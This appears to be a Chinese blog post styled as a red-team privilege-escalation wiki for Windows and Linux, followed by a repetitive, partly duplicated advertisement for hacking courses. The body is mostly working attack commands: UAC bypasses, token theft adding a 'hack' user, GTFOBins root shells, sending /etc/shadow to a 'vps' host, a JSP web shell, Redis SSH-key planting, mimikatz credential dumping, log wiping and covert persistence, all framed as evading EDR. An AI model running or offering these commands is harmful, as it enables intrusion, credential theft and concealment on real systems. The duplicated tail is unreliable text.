程序员安全小白必藏！红队提权实战全指南：无文件不出网低权限提权攻略

程序员&安全小白必藏！红队提权实战全指南：无文件不出网低权限提权攻略

本文面向红队实战场景，覆盖Windows、Linux全平台提权技术，包含Bypass UAC绕过、EDR隐身对抗、苛刻环境提权方案，结合白利用与自动化工具，附合规声明，适合安全从业者及新手学习。

PRIVILEGE ESCALATION | FALSESPACE WIKI

无文件 + 不出网 + 不触发告警 + 低权限可用 | Redteam LPE Wiki

0x01 提权哲学：逻辑欺骗 vs 暴力破坏

现代操作系统防御越来越厚（ASLR/KVA/SafeDisc），硬砸内核极易导致蓝屏、触发告警、被EDR实时拦截。逻辑提权是红队实战首选，核心是：利用系统合法规则，制造程序员未预期的权限提升效果。

四大核心攻击面（深度强化）

• Token (访问令牌)

：系统身份凭证。提权本质 = 窃取高权限令牌（SYSTEM/域管）并绑定自身进程。

• Impersonation (模拟)

：高权限服务为低权限用户执行操作时遗留权限，可反向劫持接管。

• Symlinks (符号链接)

：路径劫持虫洞，让高权限进程帮我们写入/修改系统敏感目录。

• 白利用信任链

：让系统自带程序执行恶意操作，伪装成合法行为。

红队黄金法则

1. 不修改系统核心文件 → 不蓝屏

2. 不使用未签名程序 → 不被杀软拦截

3. 不执行高危API → 不触发EDR

4. 一切操作伪装成系统正常行为

0x02 攻占金库：标准提权战术蓝图

场景定义

你已获取初始低权限访问（WebShell/钓鱼上线），身份为普通用户。提权 = 从游客权限 → 服务器最高控制权（SYSTEM/root）。

标准流程

打点上线 → 静默信息收集 → 漏洞/配置挖掘 → 无文件利用 → 凭据+持久化

核心分类

• Bypass UAC

：管理员组用户被UAC限制，劫持系统白名单程序，绕过验证直接获取完整管理员权限。

• LPE 本地提权

：普通用户无管理员身份，利用配置错误/服务漏洞/令牌劫持，直接获取SYSTEM权限。

0x03 EDR/杀软对抗：隐身提权核心

EDR 全流量监控范围

进程钩子、lsass.exe 访问、内存注入、服务修改、注册表敏感项、异常命令行、未签名程序执行。
对抗核心：不落地、不注入、不碰敏感进程、纯系统白程序利用。

无文件对抗体系

whoami /priv # 低权限查询，无告警 wmic process call create # 无文件命令执行 rundll32 shell32.dll # 白名单DLL调用 reg query /add # 温和注册表操作

高危规避清单（绝对禁止）

• ❌ 直接读写 lsass.exe 进程
• ❌ 运行明文 mimikatz 等黑客工具
• ❌ 新建系统服务/修改启动项
• ❌ 使用 cmd/powershell 执行敏感命令

隐身执行方案

替代方案：wmic/mshta/rundll32/control系统自带白程序

0x04 Windows 实战：全提权方式 + 深度详解

1）未引号服务路径提权【全版本通用】

原理：路径含空格无引号，Windows会截断执行空格前程序
拦截率：低 | 苛刻环境：可用

wmic service get name,pathname | findstr "C:/Program" | findstr /v """" copy cmd.exe "C:/Program.exe" sc stop 服务名 && sc start 服务名

2）令牌窃取 Potato 提权【高权限首选】

原理：利用模拟权限诱骗SYSTEM授权
拦截率：中 | 苛刻环境：需权限

whoami /priv GodPotato -c "cmd /c net user hack Admin@123 /add"

3）服务弱 ACL 提权【实战高频】

原理：普通用户可修改服务配置
拦截率：极低 | 苛刻环境：可用

sc qc wuauserv sc config wuauserv binPath= "C:/temp/cmd.exe"

4）AlwaysInstallElevated 提权【MSI静默】

原理：组策略允许MSI以SYSTEM安装
拦截率：低 | 苛刻环境：可用

reg query ... /v AlwaysInstallElevated msfvenom -p windows/exec CMD=cmd.exe -f msi -o a.msi

0x05 Bypass UAC 实战专题（无文件｜免杀｜高成功率）

UAC 是 Windows 权限隔离机制，管理员默认运行程序仍受限制，必须「以管理员身份运行」才能获得完整权限。
Bypass UAC = 静默获取管理员权限，无弹窗、免确认、免杀稳定。

一、fodhelper.exe 白利用（Win10/11 通用｜最强）

reg add HKCU/Software/Classes/ms-settings/Shell/Open/command /d "cmd.exe" /f reg add HKCU/Software/Classes/ms-settings/Shell/Open/command /v "DelegateExecute" /t REG_SZ /d "" /f start fodhelper.exe

二、computerdefaults.exe 绕过（稳定免杀）

reg add "HKCU/Software/Classes/ms-settings/shell/open/command" /d "cmd.exe" /f reg add "HKCU/Software/Classes/ms-settings/shell/open/command" /v DelegateExecute /t REG_SZ /d "" /f start computerdefaults.exe

三、slui.exe 经典绕过（兼容性极强）

reg add HKCU/Software/Classes/exefile/shell/open/command /d "cmd.exe" /f reg add HKCU/Software/Classes/exefile/shell/open/command /v "DelegateExecute" /t REG_SZ /d "" /f start slui.exe

四、无文件无注册表 LOLBAS 绕过

mshta 无痕绕过

mshta "javascript:var shell=new ActiveXObject('Shell.Application');shell.ShellExecute('cmd.exe','','','runas',1);close();"

PowerShell 无文件提权

powershell Start-Process cmd -Verb RunAs

五、痕迹清理（实战必备）

reg delete HKCU/Software/Classes/ms-settings /f reg delete HKCU/Software/Classes/exefile /f

0x06 LOLBAS 无文件提权实战体系

LOLBAS：Living Off The Land Binaries，系统自带白名单程序，EDR最难拦截

命令执行（无CMD/PowerShell）

rundll32.exe shell32.dll,ShellExec_RunDLL cmd.exe

静默脚本执行

mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run(""calc"")(window.close)")

无文件进程创建

wmic process call create "cmd /c whoami"

白名单注册组件

regsvr32 /s /n /u /i:http://vps/script.sct scrobj.dll

适用场景：无写入权限、无网络、杀软拉满、命令行被限制

0x07 Linux 实战：全提权方式 + 深度详解

1）SUID 权限提权【最高命中】

原理：SUID程序运行时继承所有者权限

find / -perm -4000 2>/dev/null | grep find find . -exec /bin/sh -p /; -quit

2）sudo 权限滥用提权【最常用】

sudo -l sudo vim -c '!sh' sudo awk 'BEGIN {system("/bin/sh")}'

3）定时任务 Cron 提权【配置漏洞】

cat /etc/crontab echo"chmod +s /bin/bash" >> /opt/auto.sh /bin/bash -p

4）Capability 能力提权【高级利用】

getcap /usr/bin/python3 python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

0x08 GTFOBins 高级绕过体系

GTFOBins：Linux/Unix 标准工具的提权/绕过用法，无恶意代码，100%合法程序

文本工具提权

sudo less /etc/passwd → !sh

压缩工具提权

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=sh

网络工具提权

sudo curl -T /etc/shadow http://vps

环境变量劫持

echo'/bin/sh -p' > /tmp/ls && chmod +x /tmp/ls export PATH=/tmp:$PATH sudo 目标程序

0x09 苛刻实战专用提权路线

无文件 + 不出网 + 不触发告警 + 低权限可用（真实红队90%命中率）

实战苛刻环境特征

• 纯内网不出网、无文件写入权限、EDR/主机加固拉满
• CMD/PowerShell被禁用、无敏感权限、所有目录只读
• Potato/内核漏洞全失效，UAC绕过全拦截

顶级可用方案（深度强化）

1）配置泄露提权（最高命中）

type C:/Windows/System32/Tasks/* type C:/*/web.config type C:/*/*.properties

2）注册表密码读取（无写入）

reg query HKLM/SAM reg query "HKLM/SOFTWARE/.../Winlogon"

3）离线哈希导出（不出网）

reg save HKLM/SAM sam.hive reg save HKLM/SYSTEM system.hive

4）凭据复用提权（最稳）

runas /user:administrator cmd wmic process call create "cmd" /user:admin /password:xxx

0x0A 中间件提权实战

Tomcat WAR 部署提权

echo'<% Runtime.getRuntime().exec(request.getParameter("c"));%>' > s.jsp jar -cvf s.war s.jsp curl -u admin:admin "http://x:8080/manager/deploy?path=/s"

Redis 写 SSH 公钥（无密码登陆）

redis-cli -h x config setdir /root/.ssh set x "/n/n`cat id_rsa.pub`/n/n" config set dbfilename authorized_keys save

WebLogic/JBoss 反序列化提权

java -jar ysoserial.jar CommonsCollections1 "whoami" > payload.ser curl http://x:7001/ --data-binary @payload.ser

0x0B 数据库提权实战

MySQL UDF 提权

createfunction sys_eval returnsinteger soname 'lib_mysqludf_sys.so'; select sys_eval('id'); select sys_eval('chmod +s /bin/bash');

MSSQL xp_cmdshell 提权

sp_configure 'xp_cmdshell',1; reconfigure; xp_cmdshell 'net user hack 123 /add';

MongoDB 未授权提权

mongo x use admin db.grantRolesToUser("test",[{role:"root",db:"admin"}])

0x0C 极端环境提权（无CMD/无网络/无写入）

无命令行环境执行

wmic process call create "tasklist" mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run(...)")

纯离线提权方案

• 令牌窃取（本地）
• 服务弱ACL（本地）
• 符号链接劫持（本地）
• UAC白名单绕过（本地）

无文件写入利用

rundll32 advpack.dll,LaunchINFSection test.inf regsvr32 /s /n /u /i:script.sct scrobj.dll

0x0D 战利品收割 + 权限持久化

凭据导出（隐身版）

privilege::debug sekurlsa::logonpasswords lsadump::sam reg save HKLM/SAM sam.save

痕迹清理（无告警）

wevtutil cl Security wevtutil cl System rm -rf /tmp/* history -c && > ~/.bash_history

隐蔽持久化

reg add HKLM/.../Run /v hack /t REG_SZ /d "cmd.exe" schtasks /create /tn "hack" /tr "cmd" /sc onlogon echo"bash -i" >> /etc/rc.local

0x0E 自动化提权军火库

⚠️ 法律合规声明

本文档仅用于授权渗透测试、企业安全加固与技术学习。
未经授权入侵他人计算机系统属于违法行为，一切法律责任由操作者自行承担！

专家讲师：Yumu | 10 年安全攻防经验
FALSESPACE WIKI 将复杂降维，让知识共享 2026

互动话题：如果你对网络攻防技术感兴趣，想学习更多网安方面的知识和工具，可以看看以下题外话！

题外话

黑客/网络安全学习路线

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

网络安全学习资源分享:

下面给大家分享一份2026最新版的网络安全学习路线资料，帮助新人小白更系统、更快速的学习黑客技术！

一、2026最新网络安全学习路线

一个明确的学习路线可以帮助新人了解从哪里开始，按照什么顺序学习，以及需要掌握哪些知识点。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

**读者福利 |***CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享 *（安全链接，放心点击）

我们把学习路线分成L1到L4四个阶段，一步步带你从入门到进阶，从理论到实战。

L1级别:网络安全的基础入门

L1阶段：我们会去了解计算机网络的基础知识，以及网络安全在行业的应用和分析；学习理解安全基础的核心原理，关键技术，以及PHP编程基础；通过证书考试，可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。

L2级别：网络安全的技术进阶

L2阶段我们会去学习渗透测试：包括情报收集、弱口令与口令爆破以及各大类型漏洞，还有漏洞挖掘和安全检查项目，可参加CISP-PTE证书考试。

L3级别：网络安全的高阶提升

L3阶段：我们会去学习反序列漏洞、RCE漏洞，也会学习到内网渗透实战、靶场实战和技术提取技术，系统学习Python编程和实战。参加CISP-PTE考试。

L4级别：网络安全的项目实战

L4阶段：我们会更加深入进行实战训练，包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题

整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握；而L3 L4更多的是通过项目实战来掌握核心技术，针对以上网安的学习路线我们也整理了对应的学习视频教程，和配套的学习资料。

二、技术文档和经典PDF书籍

书籍和学习文档资料是学习网络安全过程中必不可少的，我自己整理技术文档，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，（书籍含电子版PDF）

三、网络安全视频教程

对于很多自学或者没有基础的同学来说，书籍这些纯文字类的学习教材会觉得比较晦涩难以理解，因此，我们提供了丰富的网安视频教程，以动态、形象的方式展示技术概念，帮助你更快、更轻松地掌握核心知识。

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

四、网络安全护网行动/CTF比赛

学以致用，当你的理论知识积累到一定程度，就需要通过项目实战，在实际操作中检验和巩固你所学到的知识，同时为你找工作和职业发展打下坚实的基础。

五、网络安全工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

面试不仅是技术的较量，更需要充分的准备。

在你已经掌握了技术之后，就需要开始准备面试，我们将提供精心整理的网安面试题库，涵盖当前面试中可能遇到的各种技术问题，让你在面试中游刃有余。

如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

**读者福利 |***CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享 *（安全链接，放心点击）

文章来自网上，侵权请联系博主

你在面试中游刃有余。

如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

**读者福利 |***CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享 *（安全链接，放心点击）

文章来自网上，侵权请联系博主

文章来自网上，侵权请联系博主